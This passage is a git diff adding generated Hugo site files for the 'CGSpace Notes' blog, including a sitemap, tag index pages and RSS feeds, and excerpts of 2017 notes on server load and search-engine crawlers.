+    <loc>https://alanorth.github.io/cgspace-notes/2020-06/</loc>
+    <lastmod>2020-07-08T16:30:40+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-05/</loc>
+    <lastmod>2020-06-01T13:55:08+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-04/</loc>
+    <lastmod>2020-05-31T20:15:08+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-03/</loc>
+    <lastmod>2020-04-02T12:33:41+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-02/</loc>
+    <lastmod>2022-05-05T16:50:10+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2020-01/</loc>
+    <lastmod>2021-09-20T15:47:34+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-12/</loc>
+    <lastmod>2019-12-30T14:28:15+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-11/</loc>
+    <lastmod>2019-11-28T17:30:45+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-10/</loc>
+    <lastmod>2019-10-29T17:41:17+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-09/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-08/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-07/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-06/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-05/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-04/</loc>
+    <lastmod>2021-08-18T15:29:31+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-03/</loc>
+    <lastmod>2020-07-24T21:57:55+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-02/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2019-01/</loc>
+    <lastmod>2022-03-22T22:03:59+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-12/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-11/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-10/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-09/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-08/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-07/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-06/</loc>
+    <lastmod>2020-02-17T11:38:34+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-05/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-04/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-03/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-02/</loc>
+    <lastmod>2020-11-18T17:15:23+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2018-01/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-12/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-11/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-10/</loc>
+    <lastmod>2019-10-28T13:39:25+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</loc>
+    <lastmod>2019-10-28T13:40:20+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/tags/notes/</loc>
+    <lastmod>2020-11-30T12:10:20+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-09/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-08/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-07/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-06/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-05/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-04/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-03/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-02/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2017-01/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-12/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-11/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-10/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-09/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-08/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-07/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-06/</loc>
+    <lastmod>2020-11-30T12:10:20+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-05/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-04/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-03/</loc>
+    <lastmod>2020-04-13T15:30:24+03:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-02/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2016-01/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2015-12/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url><url>
+    <loc>https://alanorth.github.io/cgspace-notes/2015-11/</loc>
+    <lastmod>2018-03-09T22:10:33+02:00</lastmod>
+  </url>
+</urlset>
diff --git a/docs/tags/index.html b/docs/tags/index.html
new file mode 100644
index 000000000..366ca9433
--- /dev/null
+++ b/docs/tags/index.html
@@ -0,0 +1,176 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Tags" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/tags/" />
+<meta property="og:updated_time" content="2021-09-21T12:46:34+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Tags"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/tags/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/tags/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/tags/migration/">Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-02-21T13:27:35+02:00">Sun Feb 21, 2021</time> by Alan Orth</p>
+  </header>
+  
+  <a href='https://alanorth.github.io/cgspace-notes/tags/migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/tags/notes/">Notes</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-09-07T16:54:52+07:00">Thu Sep 07, 2017</time> by Alan Orth</p>
+  </header>
+  
+  <a href='https://alanorth.github.io/cgspace-notes/tags/notes/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/tags/index.xml b/docs/tags/index.xml
new file mode 100644
index 000000000..1c087c02d
--- /dev/null
+++ b/docs/tags/index.xml
@@ -0,0 +1,29 @@
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+  <channel>
+    <title>Tags on CGSpace Notes</title>
+    <link>https://alanorth.github.io/cgspace-notes/tags/</link>
+    <description>Recent content in Tags on CGSpace Notes</description>
+    <generator>Hugo -- gohugo.io</generator>
+    <language>en-us</language>
+    <lastBuildDate>Sun, 21 Feb 2021 13:27:35 +0200</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/tags/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/tags/migration/</link>
+      <pubDate>Sun, 21 Feb 2021 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/tags/migration/</guid>
+      <description></description>
+    </item>
+    
+    <item>
+      <title>Notes</title>
+      <link>https://alanorth.github.io/cgspace-notes/tags/notes/</link>
+      <pubDate>Thu, 07 Sep 2017 16:54:52 +0700</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/tags/notes/</guid>
+      <description></description>
+    </item>
+    
+  </channel>
+</rss>
diff --git a/docs/tags/migration/index.html b/docs/tags/migration/index.html
new file mode 100644
index 000000000..9c2f5a97a
--- /dev/null
+++ b/docs/tags/migration/index.html
@@ -0,0 +1,209 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Migration" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/tags/migration/" />
+<meta property="og:updated_time" content="2021-09-21T12:46:34+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Migration"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/tags/migration/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/tags/migration/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/">CGSpace CG Core v2 Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-02-21T13:27:35+02:00">Sun Feb 21, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p>
+<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/">CGSpace DSpace 6 Upgrade</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-11-15T13:27:35+02:00">Sun Nov 15, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgiar-library-migration/">CGIAR Library Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-09-18T16:38:35+03:00">Mon Sep 18, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgiar-library-migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/tags/migration/index.xml b/docs/tags/migration/index.xml
new file mode 100644
index 000000000..274fa247f
--- /dev/null
+++ b/docs/tags/migration/index.xml
@@ -0,0 +1,39 @@
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+  <channel>
+    <title>Migration on CGSpace Notes</title>
+    <link>https://alanorth.github.io/cgspace-notes/tags/migration/</link>
+    <description>Recent content in Migration on CGSpace Notes</description>
+    <generator>Hugo -- gohugo.io</generator>
+    <language>en-us</language>
+    <lastBuildDate>Sun, 21 Feb 2021 13:27:35 +0200</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/tags/migration/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>CGSpace CG Core v2 Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</link>
+      <pubDate>Sun, 21 Feb 2021 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</guid>
+      <description>&lt;p&gt;Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.&lt;/p&gt;
+&lt;p&gt;With reference to &lt;a href=&#34;https://agriculturalsemantics.github.io/cg-core/cgcore.html&#34;&gt;CG Core v2 draft standard&lt;/a&gt; by Marie-Angélique as well as &lt;a href=&#34;http://www.dublincore.org/specifications/dublin-core/dcmi-terms/&#34;&gt;DCMI DCTERMS&lt;/a&gt;.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGSpace DSpace 6 Upgrade</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</link>
+      <pubDate>Sun, 15 Nov 2020 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</guid>
+      <description>&lt;p&gt;Notes about the DSpace 6 upgrade on CGSpace in 2020-11.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGIAR Library Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</link>
+      <pubDate>Mon, 18 Sep 2017 16:38:35 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</guid>
+      <description>&lt;p&gt;Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called &lt;em&gt;CGIAR System Organization&lt;/em&gt;.&lt;/p&gt;</description>
+    </item>
+    
+  </channel>
+</rss>
diff --git a/docs/tags/migration/page/1/index.html b/docs/tags/migration/page/1/index.html
new file mode 100644
index 000000000..91b4d8e69
--- /dev/null
+++ b/docs/tags/migration/page/1/index.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en-us">
+  <head>
+    <title>https://alanorth.github.io/cgspace-notes/tags/migration/</title>
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/tags/migration/">
+    <meta name="robots" content="noindex">
+    <meta charset="utf-8">
+    <meta http-equiv="refresh" content="0; url=https://alanorth.github.io/cgspace-notes/tags/migration/">
+  </head>
+</html>
diff --git a/docs/tags/notes/index.html b/docs/tags/notes/index.html
new file mode 100644
index 000000000..0f7ffe64a
--- /dev/null
+++ b/docs/tags/notes/index.html
@@ -0,0 +1,439 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/tags/notes/" />
+<meta property="og:updated_time" content="2020-11-30T12:10:20+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/tags/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/tags/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-09/">September, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-09-07T16:54:52+07:00">Thu Sep 07, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-09-06">2017-09-06</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours</li>
+</ul>
+<h2 id="2017-09-07">2017-09-07</h2>
+<ul>
+<li>Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-08/">August, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-08-01T11:51:52+03:00">Tue Aug 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-08-01">2017-08-01</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours</li>
+<li>I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)</li>
+<li>The good thing is that, according to <code>dspace.log.2017-08-01</code>, they are all using the same Tomcat session</li>
+<li>This means our Tomcat Crawler Session Valve is working</li>
+<li>But many of the bots are browsing dynamic URLs like:
+<ul>
+<li>/handle/10568/3353/discover</li>
+<li>/handle/10568/16510/browse</li>
+</ul>
+</li>
+<li>The <code>robots.txt</code> only blocks the top-level <code>/discover</code> and <code>/browse</code> URLs&hellip; we will need to find a way to forbid them from accessing these!</li>
+<li>Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li>
+<li>It turns out that we&rsquo;re already adding the <code>X-Robots-Tag &quot;none&quot;</code> HTTP header, but this only forbids the search engine from <em>indexing</em> the page, not crawling it!</li>
+<li>Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;</li>
